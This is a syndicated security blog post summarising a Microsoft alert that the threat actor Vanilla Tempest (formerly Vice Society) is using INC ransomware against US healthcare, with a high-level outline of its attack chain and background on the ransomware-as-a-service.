As per a recent Microsoft alert, a threat actor with malicious financial motives has been observed leveraging a new INC ransomware strain to target the health sector in the United States (US). In this article, we’ll dive into the details and determine who the threat actor is and how such attacks are carried out. Let’s begin!  

Microsoft Alert On Vanilla Tempest 

Given the details in the Microsoft alert, threat intelligence teams are tracking activities pertaining to this threat actor under the name Vanilla Tempest, previously known as DEV-0832 and Vice Society. 

Ever since 2021, the threat actor has built a reputation for targeting different sectors, including education, healthcare, IT, and manufacturing. Various ransomware strains that were used throughout these attacks include:  

• Rhysida
• Zeppelin. 
• BlackCat. 
• Quantum Locker. 

CheckPoint, a software technologies company, also connected Vanilla Tempest to a Rhysida ransomware group. It was revealed that the attacks conducted by that group also targeted the healthcare sector, aiming to sell patient data acquired from Lurie Children’s Hospital in Chicago.

Given the threat actor’s activities as Vice Society, it is believed that the malicious online crime group is known for using already existing lockers for their attacks as opposed to developing a custom version. 

The INC Ransomware

Those keen on ensuring recovery and protection against such online threats must know that the INC ransomware mentioned in the Microsoft Alert is a ransomware-as-a-service (RaaS). Malicious online operations pertaining to its use have targeted both public and private organizations since July 2023. These targets include:  

• Yamaha Motor Philippines. 
• Scotland’s National Health Service (NHS).
• The U.S. division of Xerox Business Solutions (XBS).

It’s worth mentioning that the source code for INC Ransom’s Windows and Linux/ESXi encryptor versions was made available for sale in May 2024 for $300,000. The threat actor behind the sale was “salfetka,” and the announcement was made on Exploit and XSS hacking forums. 

Vanilla Tempest Attack Chain

According to the Microsoft alert, the recent cyberattacks on the US healthcare sector are the first time this threat actor has used the INC Ransom tool. The threat intelligence Microsoft alert, in a series of posts on X, has stated that: 

“Vanilla Tempest receives hand-offs from GootLoader infections by the threat actor Storm-0494, before deploying tools like the Supper backdoor, the legitimate AnyDesk remote monitoring and management (RMM) tool, and the MEGA data synchronization tool.”

Once the tools have been deployed, the attackers begin to move laterally through a compromised network by using remote desktop protocols. Afterward, threat actors proceed to using the Windows Management Instrumentation (WMI) Provider Host for deployment of the ransomware payload. 

Media reports pertaining to the Microsoft alert claim that such threat actor groups also rely on using Azure Storage Explorer and AzCopy for extracting sensitive data while attempting to evade detection. 

Conclusion 

The rise of Vanilla Tempest and the deployment of INC ransomware against US healthcare highlight the ongoing cyber threats facing critical sectors. Organizations must stay vigilant, adopt robust cybersecurity measures, and closely monitor evolving tactics used by these threat actors to mitigate potential damage.

The sources for this piece include articles in The Hacker News and Tech Business News.

The post Microsoft Alert: New INC Ransomware Targets US Healthcare appeared first on TuxCare.

*** This is a Security Bloggers Network syndicated blog from TuxCare authored by Wajahat Raja. Read the original post at: https://tuxcare.com/blog/microsoft-alert-new-inc-ransomware-targets-us-healthcare/